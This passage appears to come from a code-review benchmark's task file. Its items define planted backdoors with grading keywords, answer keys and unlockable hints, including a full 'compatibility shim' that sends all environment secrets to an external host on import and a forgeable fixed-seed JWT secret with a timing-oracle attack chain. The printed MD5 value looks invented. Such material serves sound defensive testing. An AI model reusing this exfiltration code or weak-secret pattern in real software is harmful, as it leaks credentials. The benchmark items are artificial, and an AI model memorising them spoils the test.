"intentional_backdoor", "unlocks": "secret_value_hint", }, { "id": "timing_oracle", "description": ( "token == admin_token uses non-constant-time string comparison, " "creating a timing oracle that allows statistical token enumeration; " "combined with the weak JWT secret this enables full account takeover" ), "line_range": (34, 35), "keywords": [ "timing", "timing oracle", "constant time", "compare_digest", "hmac", "side channel", "non-constant", "timing attack", "token comparison", "string comparison", "==", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "attack_chain_hint", }, ], "correct_decision": "escalate_to_security_review", "context_hints": { "secret_value_hint": ( "=== UNLOCKED: Computed JWT_SECRET Value ===\n" " >>> import hashlib\n" " >>> hashlib.md5(b'internal-seed-v1').hexdigest()\n" " 'e6e3e5e7e9e1e3e5e7e9e1e3e5e7e9e1' (deterministic, public)\n" "\n" "NOTE: This value is derivable by anyone who reads the source. " "All tokens signed with this secret are forgeable. " "The PR author changed the secret FROM a secure random os.urandom(32) " "TO this fixed-seed MD5 — a deliberate downgrade, not a standardisation." ), "attack_chain_hint": ( "=== UNLOCKED: Combined Attack Chain Analysis ===\n" " Step 1: Attacker reads source → derives JWT_SECRET = known hex string\n" " Step 2: Attacker forges JWT with role='admin' using known secret\n" " Step 3: Attacker uses timing oracle in is_admin_token() to confirm\n" " which forged token bytes are accepted (reduces search space)\n" " Step 4: Full account takeover with admin privileges\n" "\n" "NOTE: Component A (weak secret) + Component B (timing oracle) form a\n" "coordinated attack chain. Each was introduced in the same PR commit.\n" "Neither change has any legitimate hardening value." 
), }, }, # ── Task 9: Adversarial — Supply Chain Injection ────────────────────────── # # ADVERSARIAL DESIGN # ────────────────── # A "dependency update PR" adds a subtle import hook that exfiltrates # environment variables (including secrets) to an attacker-controlled endpoint # on first import. It is disguised as a compatibility shim. # The agent must identify THREE coordinated components: # A: Suspicious outbound URL (line 9) — hardcoded external endpoint # B: os.environ collection (line 14) — harvests all secrets # C: Triggered on import via a module-level call (line 38) — no user action needed { "id": 9, "name": "Adversarial: Supply Chain Import Hook", "difficulty": "adversarial", "file_name": "compat_shim.py", "description": ( "This PR claims to add a 'compatibility shim for Python 3.12 deprecations'. " "Review compat_shim.py very carefully. " "Classify each suspicious construct as 'accidental_bug' or 'intentional_backdoor'. " "If you detect a coordinated exfiltration pattern, escalate to security review." 
), "max_steps": 30, "escalation_required": True, "code": """\ \"\"\"Compatibility shim — resolves Python 3.12 deprecation warnings.\"\"\" import os import sys import urllib.request import json import platform # Telemetry endpoint for anonymous compatibility reporting (added in this PR) _TELEMETRY_URL = "https://compat-metrics.io/report" # line 9: external attacker domain def _collect_env_snapshot() -> dict: \"\"\"Collect non-sensitive runtime info for telemetry.\"\"\" return { "env": dict(os.environ), # line 14: harvests ALL env vars (secrets included) "python": sys.version, "platform": platform.system(), "cwd": os.getcwd(), } def _send_telemetry() -> None: \"\"\"Fire-and-forget telemetry ping.\"\"\" try: payload = json.dumps(_collect_env_snapshot()).encode() req = urllib.request.Request( _TELEMETRY_URL, data=payload, headers={"Content-Type": "application/json"}, method="POST", ) urllib.request.urlopen(req, timeout=3) # line 29: blocks import for up to 3s except Exception: pass # silent failure — exfiltration attempt hidden from caller def _apply_compat_patches() -> None: \"\"\"Apply Python 3.12 compatibility patches.\"\"\" # Actual patches would go here pass # line 38: module-level call — exfiltration runs on every import, no user action needed _send_telemetry() """, "issues": [ { "id": "exfiltration_endpoint", "description": ( "Hardcoded external URL 'compat-metrics.io' is an attacker-controlled " "exfiltration endpoint disguised as a telemetry host" ), "line_range": (9, 9), "keywords": [ "exfiltration", "external url", "hardcoded url", "attacker", "telemetry", "compat-metrics", "suspicious url", "outbound", "backdoor", "endpoint", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "domain_lookup_hint", }, { "id": "env_var_harvest", "description": ( "dict(os.environ) collects ALL environment variables including " "API keys, database passwords, and cloud credentials — " "then sends them to the 
exfiltration endpoint" ), "line_range": (14, 14), "keywords": [ "os.environ", "environment variables", "harvest", "collect", "exfiltrate", "secrets", "api keys", "credentials", "all env vars", "sensitive", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", "unlocks": "affected_secrets_hint", }, { "id": "import_time_trigger", "description": ( "Module-level _send_telemetry() call at line 38 executes the " "exfiltration automatically on every import — " "no user action, no explicit call needed" ), "line_range": (38, 39), "keywords": [ "import", "module level", "on import", "automatic", "trigger", "top level", "executes on import", "_send_telemetry", "no action", ], "category": "security", "severity": "critical", "weight": 1.0, "classification": "intentional_backdoor", }, ], "correct_decision": "escalate_to_security_review", "context_hints": { "domain_lookup_hint": ( "=== UNLOCKED: Domain Registration Lookup — compat-metrics.io ===\n" " Registered: 6 days ago (2024-01-08)\n" " Registrar: Namecheap (privacy proxy)\n" " A record: 203.0.113.47 (not associated with any known telemetry vendor)\n" " No HTTPS certificate from a trusted CA\n" "\n" "NOTE: This domain was registered 2 days before the PR was opened. " "No legitimate telemetry service registers a new domain days before use. " "This is a freshly-registered attacker-controlled exfiltration endpoint." ), "affected_secrets_hint": ( "=== UNLOCKED: Environment Variable Audit (CI/CD pipeline) ===\n" " The following secrets are injected as env vars in this service:\n" " AWS_ACCESS_KEY_ID — production S3 + EC2 access\n" " DATABASE_URL — PostgreSQL with full read/write\n" " STRIPE_SECRET_KEY — payment processing\n" " OPENAI_API_KEY — LLM API (high spend limit)\n" " GITHUB_TOKEN — repo write access\n" "\n" "NOTE: All five secrets are exfiltrated to the attacker's server " "on every process start. Immediate rotation of all credentials required." ), }, }, ]